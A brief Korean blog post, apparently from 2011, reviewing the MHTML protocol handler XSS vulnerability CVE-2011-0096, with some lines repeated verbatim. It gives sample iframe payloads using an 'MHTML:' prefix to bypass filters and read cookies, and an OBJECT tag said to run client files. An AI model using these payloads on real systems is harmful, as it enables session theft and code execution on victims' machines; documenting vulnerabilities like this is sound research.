보안 기술 자료 (D:\)/D:\> WEB
Microsoft MHTML Protocol Handler XSS (CVE-2011-0096)
Blaise Pascal
2011. 2. 2. 00:30
기사를 통해서 MHTML 취약점에 대해서 접한 후, 리뷰를 급하게 작성합니다.
1. 취약 대상
Windows 사용자
Windows 사용자
2. 핵심 기법
주소에 MHTML: 첨부할 경우 여러 필터링 통과 가능
주소에 MHTML: 첨부할 경우 여러 필터링 통과 가능
3. 응용
<iframe src="MHTML:http://target/file/any.html!cookie"></iframe>
<iframe src="mhtml:http://target/file/any.html?a=header with content-type"></iframe>
or content-type의 대한 보안이 있는 경우 따로 파일에 저장 후 html에 인젝션 해서 불러온다.
<OBJECT CLASSID=CLSID:1111111-1111-1111-1111-111111111111 CODEBASE=file_path></OBJECT>
클라이언트의 파일을 실행할 수 있다.
<iframe src="MHTML:http://target/file/any.html!cookie"></iframe>
<iframe src="mhtml:http://target/file/any.html?a=header with content-type"></iframe>
or content-type의 대한 보안이 있는 경우 따로 파일에 저장 후 html에 인젝션 해서 불러온다.
<OBJECT CLASSID=CLSID:1111111-1111-1111-1111-111111111111 CODEBASE=file_path></OBJECT>
클라이언트의 파일을 실행할 수 있다.